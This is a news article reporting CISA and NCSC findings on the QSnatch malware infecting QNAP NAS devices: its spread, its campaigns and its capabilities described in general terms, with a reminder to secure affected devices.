In November 2019, German and Finnish information security specialists discovered malware affecting QNAP NAS devices. Back then, it was reported that the malware, dubbed QSnatch, had infected more than 7,000 devices in Germany alone.
After gaining access to the device, the malware modifies the firmware to guarantee itself a constant presence. QSnatch is also capable of:
- make changes to scheduled tasks and scripts (cronjob, init);
- prevent firmware updates by rewriting the URLs of the update source;
- prevent the launch of the QNAP MalwareRemover security application;
- extract and steal usernames and passwords of all NAS users.
Now specialists from the Agency for Cybersecurity and Infrastructure Protection, organized under the US Department of Homeland Security (DHS CISA), as well as their colleagues from the UK National Cybersecurity Center (NCSC) report that QSnatch continues to gain traction.
According to law enforcement officials, the malware appeared in 2014, but only in the last year has it begun to pose a real threat. So, if at the end of 2019 the number of QSnatch infected devices was approximately 7000, then as of mid-July 2020 their number exceeded 62,000. CISA and NSCS experts report that approximately 7,600 infected devices are in the United States and about 3,900 in the UK.
Experts write that the first QSnatch campaign began in 2014 and lasted until mid-2017, while the second campaign began in 2018, and at the end of 2019 it was still active.
These campaigns used different versions of the QSnatch malware, and expert reports focus on the latest version of QSnatch used in the most recent campaign. This version of QSnatch comes with an advanced feature set and includes the following modules:
- CGI password logger: creates a fake version of the administrative login page and records all successful authentications (while redirecting the victim to a legitimate login page);
- a means to steal registered data;
- SSH backdoor: allows a hacker to execute arbitrary code on the device;
- Data theft tool: When launched, QSnatch steals a predefined list of files, including configuration files and logs. They are encrypted with the hackers' public key and transmitted to the attackers via HTTPS;
- web shell for remote access.
Interestingly, although experts from CISA and NCSC were able to analyze the latest version of QSnatch, they still have not figured out how the malware infiltrates devices. For example, attackers can exploit some vulnerabilities in the QNAP firmware or brute force passwords for the default administrator account, but these are just theories.
Experts remind that QNAP has long explained how to secure devices against QSnatch attacks, and urge users and administrators to take the necessary measures to protect them.